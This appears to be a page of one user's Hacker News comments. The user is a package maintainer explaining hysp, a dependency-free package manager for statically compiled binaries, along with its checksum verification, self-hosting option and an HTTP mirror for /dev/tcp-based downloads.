azathothas's comments

We cross-compiled thousands of Go CLI tools as static binaries using Zig - the blog is a summary of everything we learnt & built.

Since /dev/tcp doesn't work with https, complex redirect chains or even dns sometimes, almost all mentions of it in the hacking articles online are not that useful

We had to make soar's install script be able to work anywhere, In the article you get to know about http://http.pkgforge.dev & how you can use it to make /dev/tcp finally practical & useful in the modern https age

Interesting...

I have been building & using a statically compiled tailscale (with CGO) for a while but didn't notice any performance hits. Script: https://github.com/Azathothas/Toolpacks/blob/main/.github/sc...

Regarding pkgsrc, we came across that and the reason we eventually ended up creating hysp was that we didn't want to use any dependencies what's so ever.

So if you wanted to, you could use pure bash and nothing else to parse the TOML files that hysp uses and do everything that it does. Hysp is simply an abstraction over that philosophy.

As to the question of maintaining them, currently only I am. Hysp is a small project for now, and we have no plans to add anything that's dynamic. This will ensure low numbers of packages, but guarantee that those packages will work anywhere. So maintaining the PKGs is quite simple, I write custom build script for each of them and then GitHub Actions automates the rest. This currently requires very little manual maintenance. The following repos are where the current packages are sourced from:

https://github.com/Azathothas/Toolpacks https://github.com/Azathothas/Static-Binaries https://github.com/Azathothas/static-toolbox

I had to mention 4, because people kept asking us about security concerns. Self-Hosting everything on your own server and using hysp just as the frontend, is an option for those people.

It's up to the pkg maintainer that's being used as the source.

The default PKGs, located at: https://github.com/metis-os/hysp-pkgs, are automated via GitHub actions. You can look at the workflow codes.

As to answer the signing question:

$BIN.TOML must contain either blake3sum or sha256sum of the binary specified as source. And once hysp downloads them, it checks if they match exactly as specified in the $BIN.TOML We prevent MITM or any other shenanigans by trusting whoever is hosting the pkg, isn't tampering both the binary and the checksums. So yes, not completely foolproof (an attacker could, in theory, tamper both the binary and the checksum), but that's why we have the self-hosting option for people who want to trust only themselves and their servers. The config allows you to specify different URL/Host for the TOML files and the actual binaries.

So unless, both the TOML files and source binaries are being hosted on an HTTP site, MITM is not possible.

And as already specified, the default source that ships with hysp, doesn't use HTTP anywhere.

Hi, I am the package maintainer for https://github.com/metis-os/hysp-pkgs (The default source that's shipped with hysp)

To address your concerns:

1. Hysp is completely agnostic: Does not depend on or care about what OS, Architecture & dependencies are installed. Just parses config.toml, based on that, installs what's defined & how is it defined.

2. No Toolchains or any other kinds of dependencies are required. Each & every single binary is statically compiled. This is the core at philosophy of Hysp. A single binary that runs anywhere. No dependencies whatsoever. This saves enormous space, storage & time.

3. Self-Hostable : As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.

Hi, I am the package maintainer for https://github.com/metis-os/hysp-pkgs (The default source that's shipped with hysp)

To address your concerns:

1. Yes, the readme could be better and have better documentation explaining the why. We will update this and clearly list the reasons. Thanks for pointing it out.

As to the actual why:

1. Be completely agnostic: Do not depend on or care about what OS, Architecture & dependencies are installed. Just parse config.toml, based on that, install what's needed.

2. The default pkg source that ships with hysp, contains only statically compiled/linked binaries that will work on anything.

3. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.

Hi, I am the package maintainer for https://github.com/metis-os/hysp-pkgs (The default source that's shipped with hysp)

To address your concerns:

1. Hysp allows making request to http-only sites, because hysp doesn't care where you host your binaries. As long as you have sha256sum/blake3sum of the binaries, and they match, hysp will work.

2. The default pkg source that ships with hysp, is hosted on github itself, where's there's no need to use http. HTTP is simply a fallback, and meant for maximum compatibility.

3. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.

Hi, I am the package maintainer for https://github.com/metis-os/hysp-pkgs (The default source that's shipped with hysp)

To address your concerns: 1. Yes, no portable toolchains or any other kinds of dependencies are required.

2. Each & every single binary is statically compiled. This is the core at philosophy of Hysp. A single binary that runs anywhere.

3. Currently, there's about 200 pkgs for x86_64 & arm64 each. The upstream source (https://github.com/Azathothas/Toolpacks) has over 400 for x86_64 & 300+ for arm64, which will slowly be added to Hysp-Pkgs.

4. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.

Hi, I am the package maintainer for https://github.com/metis-os/hysp-pkgs (The default source that's shipped with hysp)

To address your concerns:

1. Hysp is a single binary (Statically compiled), download & run anywhere kind of package manager.

2. Hysp, doesn't care about dependencies, and neither does it attempt to install anything that's not specifically defined in the config.

3. Due to 1 & 2, you do not need go or rust or anything else installed to install something. No dependencies whatsoever. This saves enormous space, storage & time.

4. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.

Hi, I am the package maintainer for https://github.com/metis-os/hysp-pkgs (The default source that's shipped with hysp)

To address your concern:

1. $HOME/.local/share/hysp/bin is what's shipped as default location for reasons that others have already mentioned in this thread.

2. You can edit the config.toml to use whatever directory pleases you.

As my comment above stated, hysp relies on single binaries. The default source for PKGs that's shipped with hysp, contains only statically compiled binaries. This allows you to run a single binary anywhere on any system. And since you can host your own binaries for whatever architecture, hysp is agnostic. Further, since only binaries are installed, there's no need for toolchains/cache or any kind of other dependencies.

Hi, I am the package maintainer for https://github.com/metis-os/hysp-pkgs (The default source that's shipped with hysp)

To address your concerns: 1. Hysp is not a developer tool and isn't meant to be used as such.

2. Nix, Conda etc. all can & do work without requiring elevated privileges or root. However, what differentiates hysp, is that it is simply a downloader for a binary hosted somewhere else (defined in config file), that it fetches, verifies sha256sum/blake3 sum & puts in the directory (also defined in config file) which can be then directly called & used.

3. Hysp, doesn't care about dependencies, and neither does it attempt to install anything that's not specifically defined in the config.

4. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.